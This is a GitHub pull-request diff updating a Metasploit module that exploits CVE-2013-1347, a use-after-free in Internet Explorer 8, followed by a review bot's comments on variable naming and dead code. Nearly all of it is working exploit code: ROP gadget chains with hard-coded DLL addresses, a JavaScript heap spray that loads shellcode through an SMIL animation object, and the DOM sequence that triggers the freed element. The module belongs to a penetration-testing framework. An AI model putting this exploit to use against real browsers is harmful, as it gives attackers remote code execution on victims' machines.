
Update for CVE-2013-1347 #1809

Merged
merged 3 commits into from
May 8, 2013
Merged
178 changes: 59 additions & 119 deletions modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
@@ -1,5 +1,4 @@
##
#
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
Expand Down Expand Up @@ -48,6 +47,7 @@ def initialize(info={})
[
[ 'CVE', '2013-1347' ],
[ 'OSVDB', '92993' ],
[ 'US-CERT-VU', '237655' ],
[ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],
[ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup
],
Expand Down Expand Up @@ -82,7 +82,6 @@ def initialize(info={})
end

def get_target(agent)
#If the user is already specified by the user, we'll just use that
return target if target.name != 'Automatic'

nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
Expand Down Expand Up @@ -114,80 +113,16 @@ def get_target(agent)
return nil
end

def ie8_smil(my_target, p)

case my_target['Rop']
when :msvcrt
case my_target.name
when 'IE 8 on Windows XP SP3'
align_esp = Rex::Text.to_unescape([0x77c4d801].pack("V*")) # ADD ESP, 2C; RET
xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack("V*")) # XCHG EAX, ESP, RET
when 'IE 8 on Windows Server 2003'
align_esp = Rex::Text.to_unescape([0x77bde7f6].pack("V*"))
xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack("V*"))
end
else
align_esp = Rex::Text.to_unescape([0x7C3445F8].pack("V*"))
xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack("V*"))
end

padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))
js_payload = Rex::Text.to_unescape(p)

js = %Q|
unicorn = unescape("ABCD");
unicorn2 = unescape("EEEE");
for (i=0; i < 2; i++) {
unicorn += unescape("ABCD");
}unicorn += unescape("AB");

unicorn += unescape("#{js_payload}");

animvalues = unescape("#{align_esp}");

for (i=0; i < 0x70/4; i++) {
if (i == 0x70/4-1) {
animvalues += unescape("#{xchg_esp}");
}
else {
animvalues += unescape("#{align_esp}");
}
}

animvalues += unicorn;

for(i = 0; i < 13; i++) {
animvalues += ";red";
}
|

if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate
end

return js
end

def junk(n=4)
return rand_text_alpha(n).unpack("V")[0].to_i
end

def nop
return make_nops(4).unpack("V")[0].to_i
end

def get_payload(t, cli)
code = payload.encoded

# No rop. Just return the payload.
return code if t['Rop'].nil?
rop_payload = ''

case t['Rop']
when :msvcrt
case t.name
when 'IE 8 on Windows XP SP3'
rop_gadgets =
algin = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
chain = ''

if t.name == 'IE 8 on Windows XP SP3'
chain =
[
0x77c1e844, # POP EBP # RETN [msvcrt.dll]
0x77c1e844, # skip 4 bytes [msvcrt.dll]
Expand All @@ -212,8 +147,12 @@ def get_payload(t, cli)
0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll]
].pack("V*")
when 'IE 8 on Windows Server 2003'
rop_gadgets =

elsif t.name == 'IE 8 on Windows Server 2003'
junk = rand_text_alpha(4).unpack("V")[0].to_i
nop = make_nops(4).unpack("V")[0].to_i

chain =
[
0x77bb2563, # POP EAX # RETN
0x77ba1114, # <- *&VirtualProtect()
Expand Down Expand Up @@ -241,48 +180,39 @@ def get_payload(t, cli)
0x77be6591 # PUSHAD # ADD AL,0EF # RETN
].pack("V*")
end
else
rop_gadgets =
[
0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
0xfffffdff, # Value to negate, will become 0x00000201 (dwSize)
0x7c347f98, # RETN (ROP NOP) [msvcr71.dll]
0x7c3415a2, # JMP [EAX] [msvcr71.dll]
0xffffffff,
0x7c376402, # skip 4 bytes [msvcr71.dll]
0x7c351e05, # NEG EAX # RETN [msvcr71.dll]
0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
0x7c344f87, # POP EDX # RETN [msvcr71.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]
0x7c34d201, # POP ECX # RETN [msvcr71.dll]
0x7c38b001, # &Writable location [msvcr71.dll]
0x7c347f97, # POP EAX # RETN [msvcr71.dll]
0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
0x7c345c30 # ptr to 'push esp # ret ' [msvcr71.dll]
# rop chain generated with mona.py
].pack("V*")
end

rop_payload = rop_gadgets
case t['Rop']
when :msvcrt
rop_payload << "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
rop_payload = chain + algin + payload.encoded

else
rop_payload << "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
code = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
code << payload.encoded
code << rand_text_alpha(12000)

rop_payload = generate_rop_payload('java', code)
end
rop_payload << code
rop_payload << rand_text_alpha(12000) unless t['Rop'] == :msvcrt

return rop_payload
end

def load_exploit_html(my_target, cli)
case my_target['Rop']
when :msvcrt
case my_target.name
when 'IE 8 on Windows XP SP3'
align_esp = Rex::Text.to_unescape([0x77c4d801].pack("V*")) # ADD ESP, 2C; RET
xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack("V*")) # XCHG EAX, ESP, RET
when 'IE 8 on Windows Server 2003'
align_esp = Rex::Text.to_unescape([0x77bde7f6].pack("V*"))
xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack("V*"))
end
else
align_esp = Rex::Text.to_unescape([0x7C3445F8].pack("V*"))
xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack("V*"))
end

padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))
js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))

p = get_payload(my_target, cli)
js = ie8_smil(my_target, p)

html = %Q|
<!doctype html>
Expand All @@ -293,9 +223,10 @@ def load_exploit_html(my_target, cli)
</meta>

<script>
#{js_mstime_malloc}

function helloWorld()
{
#{js}
f0 = document.createElement('span');
document.body.appendChild(f0);
f1 = document.createElement('span');
Expand All @@ -306,21 +237,32 @@ def load_exploit_html(my_target, cli)
f2.appendChild(document.createElement('datalist'));
f1.appendChild(document.createElement('span'));
f1.appendChild(document.createElement('table'));
try{
f0.offsetParent=null;
}catch(e) {

}f2.innerHTML="";
try { f0.offsetParent=null;}
catch(e) { }

f2.innerHTML = "";
f0.appendChild(document.createElement('hr'));
f1.innerHTML="";
f1.innerHTML = "";

CollectGarbage();

try {
a = document.getElementById('myanim');
a.values = animvalues;
sparkle = unescape("ABCD");
for (i=0; i < 2; i++) {
sparkle += unescape("ABCD");
}
catch(e) {}
sparkle += unescape("AB");
sparkle += unescape("#{js_payload}");

magenta = unescape("#{align_esp}");

for (i=0; i < 0x70/4; i++) {
if (i == 0x70/4-1) { magenta += unescape("#{xchg_esp}"); }
else { magenta += unescape("#{align_esp}"); }
}

magenta += sparkle;
mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:"myanim"});
}

</script>
Expand All @@ -341,7 +283,6 @@ def on_request_uri(cli, request)
print_status("Requesting: #{uri}")

my_target = get_target(agent)
# Avoid the attack if no suitable target found
if my_target.nil?
print_error("Browser not supported, sending 404: #{agent}")
send_not_found(cli)
Expand All @@ -355,4 +296,3 @@ def on_request_uri(cli, request)
end

end
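Review bot: The stack-adjustment local introduced in get_payload is misspelled `algin`, and the misspelling is carried into the assembly line `rop_payload = chain + algin + payload.encoded`; rename it to `align` at both places so the name reads as intended. `chain = ''` is also left empty when t.name matches neither of the two names checked, in which case the :msvcrt branch silently builds a payload without a chain; if get_target can never produce that combination, a one-line comment saying so would make that explicit, otherwise fail there the way get_target does with `return nil`. In load_exploit_html the `padding` local is computed but does not appear anywhere in the visible part of the html heredoc; if the collapsed lines do not use it either, it is dead code and should be dropped. The heredoc and on_request_uri both continue outside the hunks shown here.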